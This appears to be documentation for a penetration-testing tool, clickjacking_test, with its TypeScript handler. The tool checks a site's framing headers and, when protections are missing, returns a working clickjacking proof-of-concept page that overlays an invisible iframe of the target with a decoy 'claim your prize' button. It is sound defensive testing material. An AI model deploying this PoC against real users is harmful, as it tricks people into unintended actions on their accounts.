clickjacking_test
Test websites for clickjacking vulnerabilities by checking X-Frame-Options and CSP headers, then generate proof-of-concept HTML if protections are missing.
Instructions
Check X-Frame-Options and CSP frame-ancestors headers; generate PoC iframe HTML. Fetches response headers and checks for framing protections. If protections are missing, generates a ready-to-use PoC HTML page that embeds the target in a transparent iframe with a decoy button overlay. Returns: {headers, x_frame_options, csp_frame_ancestors, vulnerable, poc_html}. Side effects: Single HEAD/GET request.
Input Schema
TableJSON Schema
| Name | Required | Description | Default |
|---|---|---|---|
| target_url | Yes | URL to test for clickjacking vulnerability, e.g. https://target/my-account |
Implementation Reference
- src/tools/clickjack.ts:23-125 (handler)Handler implementation for the clickjacking_test tool, which fetches headers and generates a PoC HTML if vulnerable.
async ({ target_url }) => { requireTool("curl"); // Fetch headers const res = await runCmd("curl", [ "-sk", "-D", "-", "-o", "/dev/null", target_url, ]); const headersRaw = res.stdout; const headers: Record<string, string> = {}; let xfo: string | null = null; let cspFrame: string | null = null; for (const line of headersRaw.split("\n")) { if (line.includes(":")) { const colonIdx = line.indexOf(":"); const name = line.slice(0, colonIdx).trim().toLowerCase(); const value = line.slice(colonIdx + 1).trim(); headers[name] = value; if (name === "x-frame-options") { xfo = value; } else if (name === "content-security-policy") { for (const directive of value.split(";")) { const d = directive.trim(); if (d.startsWith("frame-ancestors")) { cspFrame = d; } } } } } const vulnerable = xfo === null && cspFrame === null; let pocHtml: string | null = null; if (vulnerable) { pocHtml = `<!DOCTYPE html> <html> <head> <title>Clickjacking PoC</title> <style> #target_iframe { position: relative; width: 800px; height: 600px; opacity: 0.0001; z-index: 2; } #decoy_button { position: absolute; top: 300px; left: 200px; z-index: 1; padding: 15px 30px; font-size: 18px; cursor: pointer; } </style> </head> <body> <h1>Click the button to claim your prize!</h1> <button id="decoy_button">Click here!</button> <iframe id="target_iframe" src="${target_url}"></iframe> </body> </html>`; } const securityHeaderKeys = new Set([ "x-frame-options", "content-security-policy", "x-content-type-options", "strict-transport-security", "x-xss-protection", "referrer-policy", "permissions-policy", ]); const allSecurityHeaders: Record<string, string> = {}; for (const [k, v] of Object.entries(headers)) { if (securityHeaderKeys.has(k)) { allSecurityHeaders[k] = v; } } const result = { target_url, x_frame_options: xfo, csp_frame_ancestors: cspFrame, all_security_headers: allSecurityHeaders, vulnerable, poc_html: pocHtml, hint: vulnerable ? "No framing protections detected. Target can be embedded in an attacker-controlled iframe." : "Framing protections present.", }; return { content: [{ type: "text", text: JSON.stringify(result, null, 2) }] }; } - src/tools/clickjack.ts:14-22 (registration)Tool registration and parameter definition for clickjacking_test.
"clickjacking_test", "Check X-Frame-Options and CSP frame-ancestors headers; generate PoC iframe HTML. Fetches response headers and checks for framing protections. If protections are missing, generates a ready-to-use PoC HTML page that embeds the target in a transparent iframe with a decoy button overlay. Returns: {headers, x_frame_options, csp_frame_ancestors, vulnerable, poc_html}. Side effects: Single HEAD/GET request.", { target_url: z .string() .describe( "URL to test for clickjacking vulnerability, e.g. https://target/my-account" ), },